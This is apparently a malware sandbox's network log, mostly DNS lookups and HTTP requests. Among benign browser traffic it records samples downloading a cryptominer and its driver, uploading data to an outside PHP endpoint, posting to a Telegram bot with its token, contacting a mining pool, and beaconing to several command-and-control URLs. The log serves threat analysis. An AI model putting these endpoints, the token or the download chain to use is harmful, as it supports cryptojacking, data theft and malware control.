                                • [GB]
                                  GET
                                  http://c.pki.goog/r/r4.crl
                                  Remote address:
                                  142.250.200.35:80
                                  Request
                                  GET /r/r4.crl HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: c.pki.goog
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                  Content-Length: 436
                                  X-Content-Type-Options: nosniff
                                  Server: sffe
                                  X-XSS-Protection: 0
                                  Date: Fri, 06 Dec 2024 01:35:55 GMT
                                  Expires: Fri, 06 Dec 2024 02:25:55 GMT
                                  Cache-Control: public, max-age=3000
                                  Age: 2524
                                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                  Content-Type: application/pkix-crl
                                  Vary: Accept-Encoding
                                • [US]
                                  DNS
                                  152.74.67.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  152.74.67.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • [US]
                                  DNS
                                  cdn-downloads.com
                                  COMSurrogate.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  cdn-downloads.com
                                  IN A
                                  Response
                                  cdn-downloads.com
                                  IN A
                                  203.161.45.11
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/mi.exe
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/mi.exe HTTP/1.1
                                  Host: cdn-downloads.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 6412800
                                  date: Fri, 06 Dec 2024 02:18:01 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/config.json
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/config.json HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/json
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 2049
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/WinRing0x64.sys
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/WinRing0x64.sys HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/octet-stream
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 14544
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/SHA256SUMS
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/SHA256SUMS HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 256
                                  date: Fri, 06 Dec 2024 02:18:04 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/xmrig-cuda.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/xmrig-cuda.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Tue, 03 Dec 2024 03:05:09 GMT
                                  accept-ranges: bytes
                                  content-length: 32908288
                                  date: Fri, 06 Dec 2024 02:18:05 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/nvrtc64_102_0.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/nvrtc64_102_0.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                • [NL]
                                  GET
                                  https://cdn-downloads.com/files/nvrtc-builtins64_102.dll
                                  COMSurrogate.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /files/nvrtc-builtins64_102.dll HTTP/1.1
                                  Host: cdn-downloads.com
                                • [NL]
                                  POST
                                  https://exodus.lat/files/upload.php
                                  curl.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  POST /files/upload.php HTTP/1.1
                                  Host: exodus.lat
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Content-Length: 1746
                                  Expect: 100-continue
                                  Content-Type: multipart/form-data; boundary=------------------------e7f4cb1975d40687
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  x-powered-by: PHP/7.4.33
                                  content-type: text/html; charset=UTF-8
                                  content-length: 85
                                  date: Fri, 06 Dec 2024 02:18:02 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • [US]
                                  DNS
                                  r11.o.lencr.org
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r11.o.lencr.org
                                  IN A
                                  Response
                                  r11.o.lencr.org
                                  IN CNAME
                                  o.lencr.edgesuite.net
                                  o.lencr.edgesuite.net
                                  IN CNAME
                                  a1887.dscq.akamai.net
                                  a1887.dscq.akamai.net
                                  IN A
                                  88.221.135.106
                                  a1887.dscq.akamai.net
                                  IN A
                                  88.221.135.113
                                • [GB]
                                  GET
                                  http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D
                                  Remote address:
                                  88.221.135.106:80
                                  Request
                                  GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOYNUtL7HcF2OF3Zxn9WfNDZg%3D%3D HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: r11.o.lencr.org
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: application/ocsp-response
                                  Content-Length: 504
                                  ETag: "E970140DF7BE26B726C80651588A42F2B4806633592AD5D71420ACB9E1EBF4FC"
                                  Last-Modified: Thu, 05 Dec 2024 00:36:00 UTC
                                  Cache-Control: public, no-transform, must-revalidate, max-age=16413
                                  Expires: Fri, 06 Dec 2024 06:51:35 GMT
                                  Date: Fri, 06 Dec 2024 02:18:02 GMT
                                  Connection: keep-alive
                                • [US]
                                  DNS
                                  168.245.100.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  168.245.100.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  168.245.100.95.in-addr.arpa
                                  IN PTR
                                  a95-100-245-168deploystaticakamaitechnologiescom
                                • [US]
                                  DNS
                                  106.135.221.88.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  106.135.221.88.in-addr.arpa
                                  IN PTR
                                  Response
                                  106.135.221.88.in-addr.arpa
                                  IN PTR
                                  a88-221-135-106deploystaticakamaitechnologiescom
                                • [US]
                                  DNS
                                  location.services.mozilla.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  location.services.mozilla.com
                                  IN A
                                  Response
                                  location.services.mozilla.com
                                  IN CNAME
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  35.190.72.216
                                • [US]
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  35.244.181.201
                                • [US]
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  35.244.181.201
                                • [US]
                                  GET
                                  https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                                  firefox.exe
                                  Remote address:
                                  35.190.72.216:443
                                  Request
                                  GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/2.0
                                  host: location.services.mozilla.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  content-type: application/json
                                  te: trailers
                                • [US]
                                  DNS
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN A
                                  35.190.72.216
                                • [US]
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                • [US]
                                  DNS
                                  201.181.244.35.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  201.181.244.35.in-addr.arpa
                                  IN PTR
                                  Response
                                  201.181.244.35.in-addr.arpa
                                  IN PTR
                                  20118124435bcgoogleusercontentcom
                                • [US]
                                  DNS
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • [US]
                                  DNS
                                  ciscobinary.openh264.org
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ciscobinary.openh264.org
                                  IN A
                                  Response
                                  ciscobinary.openh264.org
                                  IN CNAME
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com
                                  a17.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  IN CNAME
                                  a19.dscg10.akamai.net
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • [US]
                                  DNS
                                  ciscobinary.openh264.org
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ciscobinary.openh264.org
                                  IN A
                                  Response
                                  ciscobinary.openh264.org
                                  IN CNAME
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com
                                  a17.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  IN CNAME
                                  a19.dscg10.akamai.net
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • [US]
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • [GB]
                                  GET
                                  https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
                                  host: redirector.gvt1.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  te: trailers
                                • [US]
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • [US]
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  142.250.187.206
                                • [GB]
                                  GET
                                  http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip
                                  firefox.exe
                                  Remote address:
                                  88.221.134.209:80
                                  Request
                                  GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
                                  Host: ciscobinary.openh264.org
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  Accept: */*
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  Connection: keep-alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
                                  ETag: 09372174e83dbbf696ee732fd2e875bb
                                  Content-Length: 491284
                                  Accept-Ranges: bytes
                                  X-Timestamp: 1731033473.13891
                                  Content-Type: application/zip
                                  X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
                                  Cache-Control: public, max-age=79381
                                  Expires: Sat, 07 Dec 2024 00:21:14 GMT
                                  Date: Fri, 06 Dec 2024 02:18:13 GMT
                                  Connection: keep-alive
                                • [US]
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN A
                                  Response
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • [US]
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN A
                                  Response
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • US
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  Response
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:869b
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:86d1
                                • US
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN AAAA
                                  Response
                                  redirector.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:81f::200e
                                • US
                                  DNS
                                  r4---sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4---sn-aigzrnsz.gvt1.com
                                  IN A
                                  Response
                                  r4---sn-aigzrnsz.gvt1.com
                                  IN CNAME
                                  r4.sn-aigzrnsz.gvt1.com
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  74.125.175.169
                                • GB
                                  GET
                                  https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  74.125.175.169:443
                                  Request
                                  GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733451493,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733451136&mv=m&mvi=4&pl=25&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com HTTP/1.1
                                  Host: r4---sn-aigzrnsz.gvt1.com
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  Accept: */*
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate, br
                                  Connection: keep-alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Cache-Control: public,max-age=86400
                                  Content-Disposition: attachment
                                  Content-Length: 14485862
                                  Content-Security-Policy: default-src 'none'
                                  Content-Type: application/zip
                                  Etag: "1d3918c"
                                  Server: downloads
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: SAMEORIGIN
                                  X-Xss-Protection: 0
                                  Date: Thu, 05 Dec 2024 12:44:59 GMT
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Last-Modified: Thu, 05 Oct 2023 00:56:47 GMT
                                  Connection: keep-alive
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,quic=":443"; ma=2592000; v="46"
                                  Vary: Origin
                                • US
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN A
                                  74.125.175.169
                                • US
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:1b::9
                                • US
                                  DNS
                                  r4.sn-aigzrnsz.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  Response
                                  r4.sn-aigzrnsz.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:1b::9
                                • US
                                  DNS
                                  216.72.190.35.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  216.72.190.35.in-addr.arpa
                                  IN PTR
                                  Response
                                  216.72.190.35.in-addr.arpa
                                  IN PTR
                                  2167219035bcgoogleusercontentcom
                                • US
                                  DNS
                                  31.243.111.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  31.243.111.52.in-addr.arpa
                                  IN PTR
                                  Response
                                • US
                                  DNS
                                  209.134.221.88.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  209.134.221.88.in-addr.arpa
                                  IN PTR
                                  Response
                                  209.134.221.88.in-addr.arpa
                                  IN PTR
                                  a88-221-134-209deploystaticakamaitechnologiescom
                                • US
                                  DNS
                                  169.175.125.74.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  169.175.125.74.in-addr.arpa
                                  IN PTR
                                  Response
                                  169.175.125.74.in-addr.arpa
                                  IN PTR
                                  lhr48s34-in-f91e100net
                                • US
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                • US
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                  Response
                                  play.google.com
                                  IN A
                                  142.250.179.238
                                • US
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN AAAA
                                  Response
                                  play.google.com
                                  IN AAAA
                                  2a00:1450:4009:81d::200e
                                • US
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN AAAA
                                  Response
                                  play.google.com
                                  IN AAAA
                                  2a00:1450:4009:81d::200e
                                • US
                                  DNS
                                  238.179.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  238.179.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  238.179.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s31-in-f141e100net
                                • US
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                • US
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • US
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • US
                                  DNS
                                  api.telegram.org
                                  COMSurrogate.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  api.telegram.org
                                  IN A
                                  Response
                                  api.telegram.org
                                  IN A
                                  149.154.167.220
                                • NL
                                  POST
                                  https://api.telegram.org/bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage
                                  COMSurrogate.exe
                                  Remote address:
                                  149.154.167.220:443
                                  Request
                                  POST /bot7859424075:AAH6p20Kp3COdNOyzKY7oNWwCIVNCkgfzac/sendMessage HTTP/1.1
                                  Content-Type: application/x-www-form-urlencoded
                                  Host: api.telegram.org
                                  Content-Length: 58
                                  Expect: 100-continue
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Fri, 06 Dec 2024 02:18:34 GMT
                                  Content-Type: application/json
                                  Content-Length: 289
                                  Connection: keep-alive
                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                • US
                                  DNS
                                  pool.hashvault.pro
                                  mi.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  pool.hashvault.pro
                                  IN A
                                  Response
                                  pool.hashvault.pro
                                  IN A
                                  95.179.241.203
                                • US
                                  DNS
                                  220.167.154.149.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  220.167.154.149.in-addr.arpa
                                  IN PTR
                                  Response
                                • US
                                  DNS
                                  203.241.179.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  95179241203vultrusercontentcom
                                • US
                                  DNS
                                  203.241.179.95.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  Response
                                  203.241.179.95.in-addr.arpa
                                  IN PTR
                                  95179241203vultrusercontentcom
                                • RU
                                  GET
                                  https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788
                                  rafencoder.exe
                                  Remote address:
                                  188.119.66.185:443
                                  Request
                                  GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa158305633775b0e650fdba1e9c95b1c92975ccf55bc592fa5a818ece02a1b7e2984c57cad7021ddd372118d73788 HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                  Host: 188.119.66.185
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:18:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.33
                                • RU
                                  GET
                                  https://188.119.66.185/ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359
                                  rafencoder.exe
                                  Remote address:
                                  188.119.66.185:443
                                  Request
                                  GET /ai/?key=8f3f2b3ae647176a7048b2a8231e72eee7c4db7e40b92a8dcd6c946a4ebd42809e7c4ce718c34f7f637df3b70caaf94cda91a6967478d3f44cc588fa45d7d69e43faeaa5960502d18f414ad332231ad03489d5d69359 HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                  Host: 188.119.66.185
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:19:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Powered-By: PHP/7.4.33
                                • US
                                  DNS
                                  185.66.119.188.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  185.66.119.188.in-addr.arpa
                                  IN PTR
                                  Response
                                • US
                                  DNS
                                  233.38.18.104.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  233.38.18.104.in-addr.arpa
                                  IN PTR
                                  Response
                                • US
                                  DNS
                                  23.149.64.172.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  23.149.64.172.in-addr.arpa
                                  IN PTR
                                  Response
                                • US
                                  DNS
                                  206.157.214.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  mailwillionebizua
                                • US
                                  DNS
                                  206.157.214.31.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.157.214.31.in-addr.arpa
                                  IN PTR
                                  mailwillionebizua
                                • 172.67.165.166:443
                                  https://atten-supporse.biz/api
                                  tls, http
                                  2M4078.exe
                                  1.0kB
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://atten-supporse.biz/api

                                  HTTP Response

                                  200
                                • 104.21.81.153:443
                                  https://se-blurry.biz/api
                                  tls, http
                                  2M4078.exe
                                  995 B
                                  4.8kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://se-blurry.biz/api

                                  HTTP Response

                                  200
                                • 185.215.113.43:80
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  http
                                  skotes.exe
                                  2.9kB
                                  3.4kB
                                  23
                                  16

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

